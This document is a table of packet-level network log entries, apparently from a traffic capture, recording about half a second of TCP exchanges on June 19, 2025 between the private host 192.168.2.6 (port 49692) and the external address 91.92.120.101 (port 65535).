Jun 19, 2025 12:58:50.815896988 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815907955 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815907955 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815922022 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815931082 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815933943 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815948009 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815960884 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815965891 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815977097 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815984964 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815992117 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816004992 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816019058 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816026926 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816030025 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816042900 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816055059 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816063881 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816063881 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816070080 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816083908 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816102982 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816107988 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816114902 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816127062 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816129923 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816143036 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816158056 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816164017 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816170931 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816186905 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816190958 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816207886 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816210985 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816220999 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816232920 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816246033 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816246033 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816267967 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816268921 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816282988 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816293955 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816306114 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816318035 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816323042 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816329956 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816344023 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816345930 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816354036 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816356897 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816369057 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816380978 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816394091 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816394091 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816407919 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816416979 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816421032 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816432953 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816440105 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816446066 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816456079 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816459894 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816473007 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816485882 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816494942 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816499949 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816514015 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816524029 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816526890 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816540956 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816551924 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816553116 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816561937 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816566944 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816581011 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816593885 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816595078 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816605091 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816618919 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816625118 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816632032 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816643953 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816646099 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816658020 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816670895 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816672087 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816685915 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816696882 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816699982 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816714048 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816725969 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.816728115 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.816756964 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.858064890 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.858088017 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.858140945 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.905183077 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.978461027 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.978481054 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.978493929 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.978507042 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.978519917 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.978549004 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.978889942 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.013067961 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013086081 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013098001 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013112068 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013123035 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013135910 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013134956 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.013153076 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013165951 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013168097 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.013184071 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.013951063 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013963938 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.013977051 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014004946 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014133930 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014144897 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014152050 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014157057 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014172077 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014183044 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014189005 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014194965 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014199018 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014209032 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014219999 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014231920 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014239073 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014244080 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014255047 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014261961 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014269114 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014286041 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014290094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014302969 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014308929 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014314890 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014327049 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014331102 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014338017 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014350891 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014353991 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014363050 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014374971 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014385939 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014391899 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014398098 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014403105 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014411926 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014424086 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014430046 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.014436960 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.014453888 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015394926 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015407085 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015418053 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015429974 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015440941 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015451908 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015465021 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015465021 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015480995 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015480995 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015495062 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015506983 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015511990 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015518904 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015530109 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015537977 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015542030 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015553951 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015566111 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015571117 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015578032 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015590906 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015594959 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015604019 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015605927 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015624046 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015634060 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015640974 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015646935 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015651941 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015659094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015670061 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015681028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015686035 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015695095 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015706062 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015712023 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015722036 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015722990 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015734911 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015747070 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015758991 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015769958 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015782118 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015783072 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015795946 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015806913 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015814066 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015819073 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015830994 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015836954 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015844107 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015856028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015861988 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015870094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015887022 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015886068 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015897989 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015918016 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015924931 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015937090 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015940905 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015949011 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015960932 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015971899 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015983105 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015989065 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.015995979 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.015999079 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016007900 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016024113 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016025066 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016036987 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016041994 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016048908 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016061068 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016067028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016077042 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016078949 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016088009 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016093969 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016100883 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016113043 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016119003 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016129017 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016129971 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016141891 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016153097 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016158104 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016165972 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016179085 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016182899 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016191006 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016201973 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016213894 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016216993 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016226053 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016239882 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.016244888 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.016262054 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.055138111 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.055233955 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.105298996 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.155180931 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.175868988 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.175877094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.175889015 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.176029921 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.176080942 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.176088095 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.176208019 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.213102102 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213201046 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213206053 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213212013 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213217020 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213222980 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213228941 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213234901 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213242054 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213248014 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213249922 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.213408947 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.213412046 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213418961 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213423967 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213428974 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213435888 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213440895 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213453054 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213459969 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213464975 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.213465929 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213474989 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213480949 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.213480949 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213495016 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.213505983 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.213515043 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.214332104 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214339018 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214350939 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214356899 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214364052 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214375973 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214382887 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214402914 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.214654922 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.214867115 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214874029 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214885950 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214891911 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214900017 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214912891 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214920044 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.214926958 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.214937925 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.214994907 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215002060 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215013027 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215018988 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215024948 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215027094 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215032101 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215044975 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215050936 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215055943 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215058088 CEST	65535	49692	91.92.120.101	192.168.2.6
